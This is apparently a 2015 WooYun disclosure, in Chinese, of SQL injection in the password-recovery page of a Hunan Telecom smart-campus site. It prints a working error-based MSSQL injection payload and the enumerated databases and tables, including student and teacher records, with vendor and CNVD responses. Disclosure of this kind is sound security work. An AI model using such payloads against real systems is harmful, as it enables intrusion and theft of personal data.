当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137515

漏洞标题:湖南电信分站存在SQL注入大量数据

相关厂商:中国电信

漏洞作者: oyeahtime

提交时间:2015-08-30 23:08

修复时间:2015-10-17 10:32

公开时间:2015-10-17 10:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-30: 细节已通知厂商并且等待厂商处理中
2015-09-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

湖南电信分站存在SQL注入大量数据

详细说明:

湖南电信智慧校园业务http://**.**.**.**
在忘记密码处过滤不严导致SQL注入
注入点:
http://**.**.**.**/FindBackPwd.aspx

---
Parameter: tbName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTEyNjE0ODU1NjFkZOQm786iBLT750ad4oRCIeuRE2QeYYf
bdlkfTiAaOMO4&__EVENTVALIDATION=/wEWBAKlmN3BCALe8o7vBgKx8PK6AwKct7iSDIThgFktCiBf
DGD1HoqWuj3rehLiTv5DNUEioZf9vr6q&hID=&tbName=18060479999' AND 8306=CONVERT(INT,(
SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8306
=8306) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)
+CHAR(113))) AND 'grFO'='grFO&btnSave=
---


注出来的数据库有其他关联的数据吧 不清楚 没有一个个的去跑表
available databases [11]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] XnCms
[*] XnCw
[*] XnDxt
[*] XnJxtCh
[*] XnJxtNew
[*] XnJxtSub
[*] XnSms
其中注出来的表
Database: msdb
[95 tables]
+-------------------------------------+
| MSdatatype_mappings |
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdac_history_internal |
| sysdac_instances |
| sysdac_instances_internal |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
+-------------------------------------+
Database: XnJxtCh
[167 tables]
+----------------------------+
| Card_Card_Edit_Log |
| Cw_Card_Hz |
| Cw_Card_Log |
| Cw_LsKt_Log |
| Cw_Sj_Cx_Hz |
| Cw_Sj_Cx_Log |
| Cw_Sj_Kt_Hz |
| Cw_Sj_Kt_Log |
| Cw_Ts_Log |
| Cw_Ts_Log_His |
| Cw_Ty_Yq_Hz |
| Cw_Ty_Yq_Log |
| Cw_Xj_Hz |
| Cw_Xj_Log |
| KaoQin_Log |
| Kq_Cw_Card_Hz |
| Kq_Cw_Card_Log |
| Kq_Cw_Sj_Kt_Hz |
| Kq_Cw_Sj_Kt_Log |
| Kq_Cw_Ts_Log |
| Kq_Cw_Ts_Log_His |
| Kq_Cw_Ty_Yq_Hz |
| Kq_Cw_Ty_Yq_Log |
| Kq_Ls_Teacher |
| Kq_Xs_Extend |
| Kq_Xs_Student |
| Ls_Teacher |
| Ls_TeacherType |
| Ls_Teacher_BanJi |
| Ls_Teacher_Del |
| Ls_Teacher_DepartMent |
| Ls_Teacher_JiFen |
| Ls_Teacher_JiFenMx |
| Ls_Teacher_ManageBanJi |
| Ls_Teacher_ManageDepart |
| Ls_Teacher_ManageNianJi |
| Ls_Teacher_Phone |
| Ls_Teacher_Sms_QianMing |
| Ls_Teacher_SpecialDepart |
| Ls_Test |
| Sms_Dx |
| Sms_Dx_Fs |
| Sms_Dx_Map |
| Sms_Erro |
| Sms_Fs |
| Sms_Fs_Img |
| Sms_Fs_Log |
| Sms_Fs_Time |
| Sms_Js |
| Sms_KaoShi |
| Sms_KaoShi_Map |
| Sms_Notice |
| Sms_Notice_Map |
| Sms_PinYu |
| Sms_PinYu_Map |
| Sms_Sms |
| Sms_Sms_2012 |
| Sms_Sms_2013 |
| Sms_Sms_JsMx |
| Sms_Sms_JsMx_2012 |
| Sms_Sms_JsMx_2013 |
| Sms_Sms_Mx |
| Sms_Sms_Mx_2012 |
| Sms_Sms_Mx_2013 |
| Sms_Sms_Timer |
| Sms_Teacher_ExtNo |
| Sms_Ty_Fs |
| Sms_ZuoYe |
| Sms_ZuoYe_Map |
| Sys_Function |
| Sys_HelpCenter |
| Sys_KeyWord |
| Sys_KouFeiFs |
| Sys_LiuYan |
| Sys_Log |
| Sys_LoginLog |
| Sys_ManagerUser |
| Sys_ManagerUser_Phone |
| Sys_Module |
| Sys_ModuleGroup |
| Sys_Module_Help |
| Sys_Role |
| Sys_RoleFunction |
| Sys_TongBuJiFen |
| Sys_TongBu_School |
| Sys_TongBu_User |
| Sys_UserRole |
| Sys_UserType |
| User_Dx_KtLog |
| User_Kt_Status |
| V_Course_Bzr |
| V_Course_Teacher |
| V_KaoQin |
| V_Kq_Ls_Teacher |
| V_Kq_Ls_Teacher_Not_TongBu |
| V_Kq_Xs_Student |
| V_Kq_Xs_Student_Not_Tongbu |
| V_Ls_Teacher |
| V_Ls_Teacher_JxtYw_Status |
| V_Ls_Teacher_Phone |
| V_School_Channel |
| V_Sms_Fs_Map |
| V_Sms_Fs_Time |
| V_Sms_JsMx |
| V_Teacher_Course |
| V_Test |
| V_Test_User |
| V_User |
| V_Xs_JiaFang |
| V_Xs_Mobile_QinQing |
| V_Xs_Score |
| V_Xs_Student |
| V_Xs_Student_Dx |
| V_Xs_Student_Phone |
| V_Xx_Bzr |
| V_Xx_Gxh |
| View_1 |
| Voip_CallAuth |
| Voip_CallEstablish |
| Voip_Hangup |
| Voip_SubAccount |
| Xs_Chat_Fj |
| Xs_Friend_Apply |
| Xs_Friend_Chat |
| Xs_InFoEdit_Log |
| Xs_JiaFang |
| Xs_JiaFang_Mx |
| Xs_KeBiao |
| Xs_Mobile_QinQing |
| Xs_QingJia |
| Xs_Score |
| Xs_StopLog |
| Xs_Student |
| Xs_Student_Phone |
| Xs_Student_Ty_Del |
| Xx_Agent |
| Xx_BanJi |
| Xx_BanJiCourse |
| Xx_BanJi_Bzr |
| Xx_BanJi_Job |
| Xx_Bj_Dynamic |
| Xx_Bj_Dynamic_Fj |
| Xx_Bj_Review |
| Xx_Course |
| Xx_Course_Tmp |
| Xx_DepartMent |
| Xx_ExtInFo |
| Xx_Jpush_Log |
| Xx_Jpush_Phone |
| Xx_KaoShi |
| Xx_KeShi |
| Xx_News |
| Xx_NianJi |
| Xx_NianJiCourse |
| Xx_NianJi_NjZz |
| Xx_SF_Hz |
| Xx_SF_Log |
| Xx_SF_User |
| Xx_School |
| Xx_School_Phone |
| Xx_SpecialDepart |
| Xx_SpecialDepart_Mx |
| Xx_User_Agent |
| f_tmp_fstj |
| f_tmp_fstj_09 |
| f_tmp_fstj_10 |
| f_tmp_fstj_1008 |
+----------------------------+

漏洞证明:

available databases [11]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] XnCms
[*] XnCw
[*] XnDxt
[*] XnJxtCh
[*] XnJxtNew
[*] XnJxtSub
[*] XnSms
当前用户是root哦

修复方案:

过滤

版权声明:转载请注明来源 oyeahtime@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-02 10:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无